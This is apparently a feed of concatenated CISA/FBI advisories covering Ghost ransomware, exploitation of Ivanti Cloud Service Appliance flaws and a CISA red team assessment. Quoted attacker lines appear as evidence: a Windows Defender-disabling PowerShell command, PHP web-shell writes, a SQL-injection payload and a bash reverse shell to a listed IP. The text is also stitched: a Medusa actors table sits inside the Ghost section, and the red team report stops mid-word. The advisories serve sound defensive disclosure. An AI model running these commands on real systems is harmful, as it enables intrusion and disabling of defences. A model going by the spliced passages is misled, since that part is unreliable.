The FBI has observed Ghost actors obtaining initial access to networks by exploiting public facing applications that are associated with multiple CVEs [T1190]. Their methodology includes leveraging vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), servers running Adobe ColdFusion (CVE-2010-2861 and CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207— commonly referred to as the ProxyShell attack chain).

Execution

Ghost actors have been observed uploading a web shell [T1505.003] to a compromised server and leveraging Windows Command Prompt [T1059.003] and/or PowerShell [T1059.001] to download and execute Cobalt Strike Beacon malware [T1105] that is then implanted on victim systems. Despite Ghost actors’ malicious implementation, Cobalt Strike is a commercially available adversary simulation tool often used for the purposes of testing an organization’s security controls.

Persistence

Persistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks. In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day. However, Ghost actors sporadically create new local [T1136.001] and domain accounts [T1136.002] and change passwords for existing accounts [T1098]. In 2024, Ghost actors were observed deploying web shells [T1505.003] on victim web servers.

Privilege Escalation

Ghost actors often rely on built in Cobalt Strike functions to steal process tokens running under the SYSTEM user context to impersonate the SYSTEM user, often for the purpose of running Beacon a second time with elevated privileges [T1134.001].

Ghost actors have been observed using multiple open-source tools in an attempt at privilege escalation through exploitation [T1068] such as “SharpZeroLogon,” “SharpGPPPass,” “BadPotato,” and “GodPotato.” These privilege escalation tools would not generally be used by individuals with legitimate access and credentials.

See Table 1 for a descriptive listing of tools.

Credential Access

Ghost actors use the built in Cobalt Strike function “hashdump” or Mimikatz [T1003] to collect passwords and/or password hashes to aid them with unauthorized logins and privilege escalation or to pivot to other victim devices.

Defense Evasion

Ghost actors used their access through Cobalt Strike to display a list of running processes [T1057] to determine which antivirus software [T1518.001] is running so that it can be disabled [T1562.001]. Ghost frequently runs a command to disable Windows Defender on network connected devices. Options used in this command are: Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend.

Discovery

Ghost actors have been observed using other built-in Cobalt Strike commands for domain account discovery [T1087.002], open-source tools such as “SharpShares” for network share discovery [T1135], and “Ladon 911” and “SharpNBTScan” for remote systems discovery [T1018]. Network administrators would be unlikely to use these tools for network share or remote systems discovery.

Lateral Movement

Ghost actors used elevated access and Windows Management Instrumentation Command-Line (WMIC) [T1047] to run PowerShell commands on additional systems on the victim network— often for the purpose of initiating additional Cobalt Strike Beacon infections. The associated encoded string is a base 64 PowerShell command that always begins with: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIA… [T1132.001][T1564.003].

This string decodes to “$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“” and is involved with the execution of Cobalt Strike in memory on the target machine.

In cases where lateral movement attempts are unsuccessful, Ghost actors have been observed abandoning an attack on a victim.

Exfiltration

Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid. However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked. The FBI has observed limited downloading of data to Cobalt Strike Team Servers [T1041]. Victims and other trusted third parties have reported limited uses of Mega.nz [T1567.002] and installed web shells for similar limited data exfiltration. Note: The typical data exfiltration is less than hundreds of gigabytes of data.

Command and Control

Ghost actors rely heavily on Cobalt Strike Beacon malware and Cobalt Strike Team Servers for command and control (C2) operations, which function using hypertext transfer protocol (HTTP) and hypertext transfer protocol secure (HTTPS) [T1071.001]. Ghost rarely registers domains associated with their C2 servers. Instead, connections made to a uniform resource identifier (URI) of a C2 server, for the purpose of downloading and executing Beacon malware, directly reference the C2 server’s IP address. For example, http://xxx.xxx.xxx.xxx:80/Google.com where xxx.xxx.xxx.xxx represents the C2 server’s IP address.

For email communication with victims, Ghost actors use legitimate email services that include traffic encryption features. [T1573] Some examples of emails services that Ghost actors have been observed using are Tutanota, Skiff, ProtonMail, Onionmail, and Mailfence.

Note: Table 2 contains a list of Ghost ransom email addresses.

Impact and Encryption

Ghost actors use Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe, which are all ransomware executables that share similar functionality. Ghost variants can be used to encrypt specific directories or the entire system’s storage [T1486]. The nature of executables’ operability is based on command line arguments used when executing the ransomware file. Various file extensions and system folders are excluded during the encryption process to avoid encrypting files that would render targeted devices inoperable.

These ransomware payloads clear Windows Event Logs [T1070.001], disable the Volume Shadow Copy Service, and delete shadow copies to inhibit system recovery attempts [T1490]. Data encrypted with Ghost ransomware variants cannot be recovered without the decryption key. Ghost actors hold the encrypted data for ransom and typically demand anywhere from tens to hundreds of thousands of dollars in cryptocurrency in exchange for decryption software [T1486].

The impact of Ghost ransomware activity varies widely on a victim-to-victim basis. Ghost actors tend to move to other targets when confronted with hardened systems, such as those where proper network segmentation prevents lateral moment to other devices.

Indicators of Compromise (IOC)

Table 1 lists several tools and applications Ghost actors have used for their operations. The use of these tools and applications on a network should be investigated further.

Note: Authors of these tools generally state that they should not be used in illegal activity.

Table 4: Defense Evasion

Technique Title ID Use

Indicator Removal: Clear Command History T1070.003 Medusa actors attempt to cover their tracks by deleting the PowerShell command line history.

Obfuscated Files or Information: Encrypted/Encoded File T1027.013 Medusa actors use a well-known evasion technique that executes a base64 encrypted command.

Obfuscated Files or Information T1027 Medusa actors obfuscated a string by slicing it into pieces and referencing it via a variable.

Indicator Removal T1070 Medusa actors deleted their previous work and tools installed.

Table 1: Tools Leveraged by Ghost Actors

Name Description Source

Cobalt Strike Cobalt Strike is penetration testing software. Ghost actors use an unauthorized version of Cobalt Strike. N/A

IOX Open-source proxy, used to establish a reverse proxy to a Ghost C2 server from an internal victim device. github[.]com/EddieIvan01/iox

SharpShares.exe SharpShares.exe is used to enumerate accessible network shares in a domain. Ghost actors use this primarily for host discovery. github[.]com/mitchmoser/SharpShares

SharpZeroLogon.exe SharpZeroLogon.exe attempts to exploit CVE-2020-1472 and is run against a target Domain Controller. github[.]com/leitosama/SharpZeroLogon

SharpGPPPass.exe SharpGPPPass.exe attempts to exploit CVE-2014-1812 and targets XML files created through Group Policy Preferences that may contain passwords. N/A

SpnDump.exe SpnDump.exe is used to list service principal name identifiers, which Ghost actors use for service and hostname enumeration. N/A

NBT.exe A compiled version of SharpNBTScan, a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration. github[.]com/BronzeTicket/SharpNBTScan

BadPotato.exe BadPotato.exe is an exploitation tool used for privilege escalation. github[.]com/BeichenDream/BadPotato

God.exe God.exe is a compiled version of GodPotato and is used for privilege escalation. github[.]com/BeichenDream/GodPotato

HFS (HTTP File Server) A portable web server program that Ghost actors use to host files for remote access and exfiltration. rejitto[.]com/hfs

Ladon 911 A multifunctional scanning and exploitation tool, often used by Ghost actors with the MS17010 option to scan for SMB vulnerabilities associated with CVE-2017-0143 and CVE-2017-0144. github[.]com/k8gege/Ladon

Web Shell A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access. Slight variation of github[.]com/BeichenDream/Chunk-Proxy/blob/main/proxy.aspx

Table 2: MD5 File Hashes Associated with Ghost Ransomware Activity

File name MD5 File Hash

Cring.exe c5d712f82d5d37bb284acd4468ab3533

Ghost.exe
34b3009590ec2d361f07cac320671410

d9c019182d88290e5489cdf3b607f982

ElysiumO.exe
29e44e8994197bdb0c2be6fc5dfc15c2

c9e35b5c1dc8856da25965b385a26ec4

d1c5e7b8e937625891707f8b4b594314

Locker.exe ef6a213f59f3fbee2894bd6734bbaed2

iex.txt, pro.txt (IOX) ac58a214ce7deb3a578c10b97f93d9c3

x86.log (IOX)
c3b8f6d102393b4542e9f951c9435255

0a5c4ad3ec240fbfd00bdc1d36bd54eb

sp.txt (IOX) ff52fdf84448277b1bc121f592f753c5

main.txt (IOX) a2fd181f57548c215ac6891d000ec6b9

isx.txt (IOX) 625bd7275e1892eac50a22f8b4a6355d

sock.txt (IOX) db38ef2e3d4d8cb785df48f458b35090

Ransom Email Addresses

Table 3 is a subset of ransom email addresses that have been included in Ghost ransom notes.

Table 3: Ransom Email Addresses

Email Addresses

asauribe@tutanota.com ghostbackup@skiff.com rainbowforever@tutanota.com

cringghost@skiff.com ghosts1337

Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications

Wed, 15 Jan 2025 17:26:11 +0000

Note: The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in Ivanti’s Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE -2025-0282 and CVE-2025-0283, see Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways.

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities.

According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors’ primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380 and the other exploited CVE-2024-8963 and CVE-2024-9379. In one confirmed compromise, the actors moved laterally to two servers.

All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below; according to Ivanti, these CVEs have not been exploited in version 5.0.[1]

Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third-party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA. Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.

Download the PDF version of this report:

AA25-022A Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications (PDF, 756.92 KB )

For a downloadable copy of IOCs, see:

AA25-022A STIX XML (XML, 105.56 KB )

AA25-022A STIX JSON (JSON, 76.91 KB )

Technical Details

Note: This advisory uses the MITRE ATT&CK^® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

In September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and CVE-2024-8963.[2][3] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[1]

CVE-2024-8963 [CWE-22: Path Traversal] is an administrate bypass vulnerability that allows threat actors to remotely access restricted features within the appliance. When used in conjunction with CVE-2024-8190 [CWE-78: OS Command Injection], threat actors can remotely authenticate into a victims’ network and execute arbitrary commands on the appliance [T1219].[2][3]

CVE-2024-9379 [CWE-89: SQL Injection] allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.[1]

CVE-2024-9380 [CWE-77: Command Injection] allows a remote authenticated attacker with admin privileges to obtain RCE.[1]

According to Ivanti’s advisories and industry reporting, these vulnerabilities were exploited as zero days.[4] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its Known Exploited Vulnerabilities (KEV) Catalog.

According to CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim—other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures.

Exploit Chain 1

The threat actors leveraged CVE-2024-8963 in conjunction with remote code execution vulnerabilities, CVE-2024-8190 and CVE-2024-9380. Acting as a `nobody` user [T1564.002], the threat actors first sent a `GET` request to `datetime.php` to acquire session and cross-site request forgery (CSRF) tokens using `GET /client/index.php%3F.php/gsb/datetime[.]php` [T1071.001]. They followed this in quick succession with a `POST` request to the same endpoint, using the `TIMEZONE` input field to manipulate the `setSystemTimeZone` function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [T1552.001]. Note: The actors used multiple script variations. See Appendix A for examples of encoded and decoded scripts.

In some cases, the threat actors exfiltrated the encrypted admin credentials then decrypted them offline [TA0010]. In other cases, the threat actors leveraged an executable matching the regular expression `php\w{6}` located in the /tmp directory to decrypt the credentials prior to exfiltration—this tool was unrecoverable.

After obtaining credentials, the actors logged in and exploited CVE-2024-9380 to execute commands from a higher privileged account. The actors successfully sent a `GET` request to `/gsb/reports[.]php`. They immediately followed this with a `POST` request using the `TW_ID` input field to execute code to implant webshells for persistence [T1505.003].

In one confirmed compromise, the threat actors tried to create webshells using two different paths:

`echo "<?php system(@`
`\$_REQUEST['a']);">/opt/ivanti/csa/broker/webroot/client/help.php`

`echo "<?php system('/bin/sudo '. @`
`\$_REQUEST['a']);" > /opt/landesk/broker/webroot/gsb/help.php`

In the same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel: `bash -i >&/dev/tcp/107.173.89[.]16/8000 0>&1`.

In another compromise, the threat actors maintained their presence on the victim’s system for a longer amount of time. The threat actors used `sudo` commands to disable the vulnerability in `DateTimeTab.php`, modify and remove webshells, and remove evidence of exploitation [T1548.003]. See Appendix B for the list of `sudo` commands used.

Lateral Movement

In one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [T1068]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [T1595.002].

Exploit Chain 2

In one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using `GET /client/index.php%3f.php/gsb/broker.php` for initial access.

After the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell to gain persistent access. They executed `GET` and `POST` requests in quick succession to `/client/index.php%3F.php/gsb/broker.php`. In the `POST` body, threat actors entered the following string in the lockout attempts input box: `LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES ('''echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>/.k''', NOW(), 10)`. The first portion of the command (LOCKOUTATTEMPTS=1) fit the format of the application and was properly handled by the application. However, the second portion of the command, a SQL injection [T1190], was not properly handled by the application. Regardless, the application processed both commands, allowing the threat actors to insert a user into the `user_info` table.

After inserting valid bash code as a user in the `user_info` table, the threat actors attempted to login as the user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login, but instead ran `echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>./k` as if it were code. The threat actors repeated the process of echo commands until they built a valid web shell [T1059]. However, there were no observations that the threat actors were successful.

Detection of Activity

According to incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations’ rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions.

Victim Organization 1

The first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement.

Victim Organization 2

This organization had an endpoint protection platform (EPP) installed on their system that alerted when the threat actors executed base64 encoded script to create webshells. There were no indications of webshells successfully being created or of lateral movement.

Victim Organization 3

This organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity.

Indicators of Compromise

See Table 1 through Table 3 for IOCs related to the threat actors’ exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 in Ivanti CSA.

Disclaimer: Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.

Table 1: IP Address Used for Credential Theft, September 2024

File Name IP Address Description

"/client/index.php%3f.php/gsb/datetime.php 142.171.217[.]195 /var/log/messages

"/client/index.php%3f.php/gsb/datetime.php 154.64.226[.]166 /var/log/messages-20240904.gz

"/client/index.php%3f.php/gsb/datetime.php 216.131.75[.]53

"/client/index.php%3f.php/gsb/datetime.php 23.236.66[.]97 /var/log/messages-20240905.gz

"/client/index.php%3f.php/gsb/datetime.php 38.207.159[.]76 /var/log/messages-20240906.gz

Table 2: Survey 2, Ivanti CSA Network IOC List, September 2024

File Name IP Address Description

149.154.167[.]41

95.161.76[.]100

hxxps://file.io/E50vtqmJP5aa

hxxps://file.io/RBKuU8gicWt

hxxps://file.io/frdZ9L18R7Nx

hxxp://ip.sb

hxxps://pan.xj.hk/d/

6401646e701f5f47518ecef48a308a36/redis

142.171.217[.]195

108.174.199[.]200

206.189.156[.]69

108.174.199[.]200/Xa27efd2.tmp

142.171.217[.]195

Table 3: Additional IOCs Derived from Incident Response, September 2024

Type IOC Description

Ipv4 107.173.89[.]16

Ipv4 38.207.159[.]76

Ipv4 142.171.217[.]195

Ipv4 154.64.226[.]166

Ipv4 156.234.193[.]18

Ipv4 216.131.75[.]53

Ipv4 205.169.39[.]11

Ipv4 23.236.66[.]97

Ipv4 149.154.176[.]41

Ipv4 95.161.76[.]100

Ipv4 142.171.217[.]195

Ipv4 108.174.199[.]200

Ipv4 206.189.156[.]69

Ipv4 142.171.217[.]195

Ipv4 67.217.228[.]83

Ipv4 203.160.72[.]174

Ipv4

Enhancing Cyber Resilience: Insights from CISA Red Team Assessment of a US Critical Infrastructure Sector Organization

Fri, 02 Aug 2024 17:17:08 +0000

EXECUTIVE SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA) conducted a red team assessment (RTA) at the request of a critical infrastructure organization. During RTAs, CISA’s red team simulates real-world malicious cyber operations to assess an organization’s cybersecurity detection and response capabilities. In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory to detail the red team’s activity—including their tactics, techniques, and procedures (TTPs) and associated network defense activity. Additionally, the advisory contains lessons learned and key findings from the assessment to provide recommendations to network defenders and software manufacturers for improving their organizations’ and customers’ cybersecurity posture.

Within this assessment, the red team (also referred to as ‘the team’) gained initial access through a web shell left from a third party’s previous security assessment. The red team proceeded to move through the demilitarized zone (DMZ) and into the network to fully compromise the organization’s domain and several sensitive business system (SBS) targets. The assessed organization discovered evidence of the red team’s initial activity but failed to act promptly regarding the malicious network traffic through its DMZ or challenge much of the red team’s presence in the organization’s Windows environment.

The red team was able to compromise the domain and SBSs of the organization as it lacked sufficient controls to detect and respond to their activities. The red team’s findings illuminate lessons learned for network defenders and software manufacturers about how to respond to and reduce risk.

Lesson Learned: The assessed organization had insufficient technical controls to prevent and detect malicious activity. The organization relied too heavily on host-based endpoint detection and response (EDR) solutions and did not implement sufficient network layer protections.

Lesson Learned: The organization’s staff require continuous training, support, and resources to implement secure software configurations and detect malicious activity. Staff need to continuously enhance their technical competency, gain additional institutional knowledge of their systems, and ensure they are provided sufficient resources by management to have the conditions to succeed in protecting their networks.

Lesson Learned: The organization’s leadership minimized the business risk of known attack vectors for the organization. Leadership deprioritized the treatment of a vulnerability their own cybersecurity team identified, and in their risk-based decision-making, miscalculated the potential impact and likelihood of its exploitation.

To reduce risk of similar malicious cyber activity, CISA encourages critical infrastructure organizations to apply the recommendations in the Mitigations section of this advisory to ensure security processes and procedures are up to date, effective, and enable timely detection and mitigation of malicious activity.

This document illustrates the outsized burden and costs of compensating for insecure software and hardware borne by critical infrastructure owners and operators. The expectation that owners and operators should maintain the requisite sophisticated cyber defense skills creates undue risk. Technology manufacturers must assume responsibility for product security. Recognizing that insecure software contributes to these identified issues, CISA urges software manufacturers to embrace Secure by Design principles and implement the recommendations in the Mitigations section of this advisory, including those listed below:

Embed security into product architecture throughout the entire software development lifecycle (SDLC).

Eliminate default passwords.

Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature.

Download the PDF version of this report:

AA24-326A Enhancing Cyber Resilience: Insights from CISA Red Team Assessment of a U.S. Critical Infrastructure Sector Organization (PDF, 823.56 KB )

INTRODUCTION

CISA has authority to—upon request—provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to federal and non-federal entities with respect to cybersecurity risks. (See generally 6 U.S.C. §§ 652[c][5], 659[c][6]). The target organization for this assessment was a critical infrastructure organization in the United States. After receiving a request for an RTA from the organization and coordinating the high-level details of the engagement, CISA conducted the RTA over approximately a three-month period.

During RTAs, a CISA red team simulates real-world threat actors to assess an organization’s cybersecurity detection and response capabilities. During Phase I, the red team attempts to gain and maintain persistent access to an organization’s enterprise network, avoid detection, evade defenses, and access SBSs. During Phase II, the red team attempts to trigger a security response from the organization’s people, processes, and/or technology.

Drafted in coordination with the assessed organization, this advisory details the red team’s activity and TTPs, associated network defense activity, and lessons learned to provide network defenders with recommendations for improving an organization’s cybersecurity posture. The advisory also provides recommendations for software manufacturers to harden their customer networks against malicious activity and reduce the likelihood of domain compromise.

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK^® Matrix for Enterprise framework, version 16. See Appendix: MITRE ATT&CK Tactics and Techniques for a table of the red team’s activity mapped to MITRE ATT&CK tactics and techniques.

Phase I: Red Team Cyber Threat Activity

Overview

The CISA red team operated without prior knowledge of the organization’s technology assets and began the assessment by conducting open source research on the target organization to gain information about its network [T1590], defensive tools [T1590.006], and employees [T1589.003]. The red team designed spearphishing campaigns [T1566] tailored to employees most likely to communicate with external parties. The phishing attempts were ultimately unsuccessful—targets ran the payloads [T1204], but their execution did not result in the red team gaining access into the network.

After the failed spearphishing campaigns, the red team continued external reconnaissance of the network [T1595] and discovered a web shell [T1505.003] left from a previous Vulnerability Disclosure Program (VDP). The red team used this for initial access [TA0001] and immediately reported it to the organization’s trusted agents (TAs). The red team leveraged that access to escalate privileges [TA0004] on the host, discover credential material on a misconfigured Network File System (NFS) share [T1552.001], and move from a DMZ to the internal network [TA0008].

With access to the internal network, the red team gained further access to several SBSs. The red team leveraged a certificate for client authentication [T1649] they discovered on the NFS share to compromise a system configured for Unconstrained Delegation. This allowed the red team to acquire a ticket granting ticket (TGT) for a domain controller [T1558.001], used to further compromise the domain. The red team leveraged this level of access to exploit SBS targets provided by the organization’s TAs.

The assessed organization detected much of the red team’s activity in their Linux infrastructure after CISA alerted them via other channels to the vulnerability the red team used for initial access. Once given an official notification of a vulnerability, the organization’s network defenders began mitigating the vulnerability. Network defenders removed the site hosting the web shell from the public internet but did not take the server itself offline. A week later, network defenders officially declared an incident once they determined the web shell was used to breach the internal network. For several weeks, network defenders terminated much of the red team’s access until the team maintained implants on only four hosts. Network defenders successfully delayed the red team from accessing many SBSs that required additional positioning, forcing the red team to spend time refortifying their access in the network. Despite these actions, the red team was still able to access a subset of SBSs. Eventually, the red team and TAs decided that the network defenders would stand down to allow the red team to continue its operations in a monitoring mode. In monitoring mode, network defenders would report what they observed of the red team’s access, but not continue to block and terminate it.

See Figure 1 for a timeline of the red team’s activity with key points access. See the following sections for additional details, including the red team’s TTPs.

Figure 1: Timeline of Red Team Cyber Threat Activity

Initial Access

Following an unsuccessful spearphishing campaign, the red team gained initial access to the target by exploiting an internet-facing Linux web server [T1190] discovered through reconnaissance [TA0043] of the organization’s external internet protocol (IP) space [T1590.005].

The red team first conducted open source research [T1593] to identify information about the organization’s network including the tools used to protect the network and potential targets for spearphishing. The red team looked for email addresses [T1589.002] and names to infer email addresses from the organization’s email syntax (discovered during reconnaissance). Following, the red team sent tailored spearphishing emails to 13 targets [T1566.002]. Of these 13 targets, one user responded and executed two malicious payloads [T1204.002]. However, the payloads failed to bypass a previously undiscovered technical control employed by the victim organization, which prevented the red team’s first attempt to gain initial access.

To find an alternate pathway for initial access, the red team conducted reconnaissance with several publicly available tools, such as Shodan and Censys, to discover accessible devices and services on the internet [T1596.005]. The red team identified an old and unpatched service with a known XML External Entity (XXE) vulnerability and leveraged a public proof of concept to deploy a web shell. The associated product had an exposed endpoint—one that system administrators should typically block from the public internet—that allowed the red team to discover a preexisting web shell on the organization’s Linux web server. The preexisting web shell allowed the red team to run arbitrary commands on the server [T1059] as a user (WEBUSER1). Using the web shell, the red team identified an open internal proxy server [T1016] to send outbound communications to the internet via Hypertext Transfer Protocol Secure (HTTPS). The red team then downloaded [T1105] and executed a Sliver payload that utilized this proxy to establish command and control (C2) over this host, calling back to their infrastructure [TA0011].

Note: Because the web shell and unpatched vulnerability allowed actors to easily gain initial access to the organization, the CISA red team determined this was a critical vulnerability. CISA reported both the vulnerability and the web shell to the organization in an official vulnerability notification so the organization could remediate both issues. Following this notification, the victim organization initiated threat hunting activities, detecting some of the red team’s activity. The TAs determined that network defenders had previously identified and reported the vulnerability but did not remediate it. Further, the TAs found that network defenders were unaware of the web shell and believed it was likely leftover from prior VDP activity. See the Defense Evasion and Victim Network Defense Activities section for more information.

Linux Infrastructure Compromise

Local Privilege Escalation and Credential Access

The red team then moved laterally from the web server to the organization’s internal network using valid accounts [T1078] as the DMZ was not properly segmented from the organization’s internal domain.

The red team acquired credentials [TA0006] by first escalating privileges on the web server. The team discovered that WEBUSER1 had excessive `sudo` rights, allowing them to run some commands as root commands without a password. They used these elevated rights to deploy a new callback with root access [T1548.003].

With root access to the web server, the team had full access to the organization’s directories and files on a NFS share with `no_root_squash` enabled. If `no_root_squash` is used, remote root users can read and change any file on the shared file system and leave a trojan horse [T1080] for other users to inadvertently execute. On Linux operating systems this option is disabled by default, yet the organization enabled it to accommodate several legacy systems. The organization’s decision to enable the `no_root_squash` option allowed the red team to read all the files on the NFS share once it escalated its privileges on a single host with the NFS share mounted. This NFS share hosted the home directories of hundreds of Linux users—many of which had privileged access to one or more servers—and was auto-mounted when those users logged into Linux hosts in the environment.

The red team used its escalated privileges to search for private certificate files, Secure Shell (SSH) private keys, passwords, bash command histories [T1552.003], and other sensitive data across all user files on the NFS share [T1039]. The team initially obtained 61 private SSH keys [T1552.004] and a file containing valid cleartext domain credentials (DOMAINUSER1) that the team used to authenticate to the organization’s domain [T1078.002].

Linux Command and Control

In the organization’s Linux environment, the red team leveraged HTTPS connections for C2 [T1071.001]. Most of the Linux systems could not directly access the internet, but the red team circumvented this by leveraging an open internal HTTPS proxy [T1090.001] for their traffic.

Lateral Movement and Persistence

The red team’s acquisition of SSH private keys generated for user and service accounts facilitated unrestricted lateral movement to other Linux hosts [T1021.004]. This acquisition included two highly privileged accounts with root access to hundreds of servers. Within one week of initial access, the team moved to multiple Linux servers and established persistence [TA0003] on four. The team used a different persistence mechanism on each Linux host, so network defenders would be less likely to discover the red team’s presence on all four hosts. The team temporarily backdoored several scripts run at boot time to maintain persistence [T1037], ensuring the original versions of the scripts were re-enabled once the team successfully achieved persistence. Some of the team’s techniques included modifying preexisting scripts run by the `cron` utility [T1053.003] and `ifup-post` scripts [T1037.003].

Of note, the team gained root access to an SBS-adjacent infrastructure management server that ran Ansible Tower. Access to this Ansible Tower system [T1072] provided easy access to multiple SBSs. The team discovered a root SSH private key on the host, which allowed the team to move to six SBSs across six different sensitive IP ranges. A week after the team provided screenshots of root access to the SBSs to the TAs, the TAs deconflicted the red team’s access to the Ansible Tower system that network defenders discovered. The organization detected the compromise by observing abnormal usage of the root SSH private key. The root SSH private key was used to log into multiple hosts at times and for durations outside of preestablished baselines. In a real compromise, the organization would have had to shut down the server, significantly impacting business operations.

Windows Domain Controller Compromise

Approximately two weeks after gaining initial access, the red team compromised a Windows domain controller. This compromise allowed the team to move laterally to all domain-joined Windows hosts within the organization.

To first gain situational awareness about the organization’s environment, the red team exfiltrated Activ

Multiple Vulnerabilities in Mozilla Firefox Could Allow for Arbitrary Code Execution

Wed, 27 Jan 2016 05:00:00 +0000
...

Multiple Vulnerabilities in Magento eCommerce Platform Could Allow Remote Code Execution

Tue, 26 Jan 2016 05:00:00 +0000
...

Vulnerability in AMX Harman Professional Devices Could Allow Unauthorized Remote Access

Mon, 25 Jan 2016 05:00:00 +0000
...

Vulnerability in Fortinet FortiOS Could Allow Unauthorized Remote Access

Mon, 25 Jan 2016 05:00:00 +0000
...

Multiple Vulnerabilities in Google Chrome Could Allow for Arbitrary Code Execution

Thu, 21 Jan 2016 05:00:00 +0000
...

Multiple Vulnerabilities in PHP Could Allow Arbitrary Code Execution

Thu, 21 Jan 2016 05:00:00 +0000
...

Multiple Vulnerabilities in Apple Products Could Allow Arbitrary Code Execution

Wed, 20 Jan 2016 05:00:00 +0000
...

Oracle Quarterly Critical Patches Issued January 19, 2016

Tue, 19 Jan 2016 05:00:00 +0000
...

Vulnerability in Microsoft Silverlight Could Allow Remote Code Execution (MS16-006)

Fri, 15 Jan 2016 05:00:00 +0000
...

Multiple Vulnerabilities in Cisco Products Could Allow for Unauthenticated, Remote Access

Thu, 14 Jan 2016 05:00:00 +0000
...

Multiple Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (MS16-004)

Tue, 12 Jan 2016 05:00:00 +0000
...

